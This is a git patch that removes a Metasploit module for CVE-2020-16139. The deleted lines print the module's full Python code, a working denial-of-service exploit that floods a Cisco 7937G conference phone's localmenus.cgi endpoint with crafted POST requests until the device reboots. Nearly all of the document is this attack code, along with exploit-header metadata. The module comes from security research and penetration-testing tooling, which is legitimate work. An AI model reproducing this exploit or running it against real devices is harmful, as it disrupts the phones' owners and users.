From dada2abaadaebdea6efb96f904a0cd18713787c6 Mon Sep 17 00:00:00 2001 From: debifrank Date: Thu, 13 Aug 2020 09:52:04 -0400 Subject: [PATCH] Delete CVE-2020-16139.py Linting --- modules/auxiliary/dos/cisco/CVE-2020-16139.py | 73 ------------------- 1 file changed, 73 deletions(-) delete mode 100644 modules/auxiliary/dos/cisco/CVE-2020-16139.py diff --git a/modules/auxiliary/dos/cisco/CVE-2020-16139.py b/modules/auxiliary/dos/cisco/CVE-2020-16139.py deleted file mode 100644 index d54dc77530..0000000000 --- a/modules/auxiliary/dos/cisco/CVE-2020-16139.py +++ /dev/null @@ -1,73 +0,0 @@ -# Exploit Title: Cisco 7937G DoS 1 MSF Module -# Date: 2020-08-10 -# Exploit Author: Cody Martin -# Author Homepage: debifrank.github.io -# Organization: BlackLanternSecurity -# Org. Homepage: BlackLanternSecurity.com -# Vendor Homepage: https://cisco.com -# Version: <=SCCP-1-4-5-7 -# Tested On: SCCP-1-4-5-5, SCCP-1-4-5-7 -# CVE: CVE-2020-16139 - -#!/usr/bin/env python3 -# -*- coding: utf-8 -*- - -# standard modules -import logging - -# extra modules -dependencies_missing = False -try: - import requests -except ImportError: - dependencies_missing = True - -from metasploit import module - - -metadata = { - 'name': 'Cisco 7937G Denial-of-Service Reboot Attack', - 'description': ''' - DoS reset attack - ''', - 'authors': [ - 'Cody Martin' - ], - 'date': '2020-06-02', - 'license': 'GPL_LICENSE', - 'references': [ - {'type': 'url', 'ref': 'https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/'}, - {'type': 'cve', 'ref': '2020-16139'}, - {'type': 'edb', 'ref': '#'} - ], - 'type': 'dos', - 'options': { - 'rhost': {'type': 'address', 'description': 'Target address', 'required': True, 'default': 'None'} - } -} - - -def run(args): - module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost'])) - if dependencies_missing: - logging.error('Module dependency (requests) is missing, cannot continue') - return - - # Exploit - url = "http://{}/localmenus.cgi".format(args['rhost']) - data = "A"*46 - payload = {"func": "609", "data": data, "rphl": "1"} - logging.info("Sending DoS packets. Stand by.") - for i in range(1000): - try: - r = requests.post(url=url, params=payload, timeout=5) - if r.status_code != 200: - logging.error("Device doesn't appear to be functioning or web access is not enabled.") - return - except requests.exceptions.RequestException: - logging.info('DoS reset attack completed!') - return - - -if __name__ == '__main__': - module.run(metadata, run)